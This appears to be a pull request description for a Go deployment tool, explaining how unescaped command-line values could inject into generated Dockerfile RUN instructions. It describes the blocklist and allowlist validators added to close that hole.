Values from `--entry_point_path`, `--a2a_agent_url`, and the derived executable name are interpolated directly into generated Dockerfile content via string concatenation, with no escaping.

In `cloudrun.go` these values only reach `COPY` paths and a `CMD` JSON-array string, so rejecting quotes/backticks/newlines/NUL is enough. In `agentengine.go`, `--entry_point_path` and the executable name are also embedded into a `RUN` instruction, which always runs in shell form (`/bin/sh -c "..."`), so shell metacharacters like `;`, `|`, and `&` are dangerous there even without any quote or newline breakout.

Adds `ValidateDockerfileSafe` (blocklist, for COPY/CMD-array contexts) and a stricter `ValidateShellArgSafe` (allowlist, for values reaching a RUN line), and applies the appropriate one at each call site. `execFile` is upgraded to the stricter check in both deploy paths for consistency, since it's always meant to be a bare filename.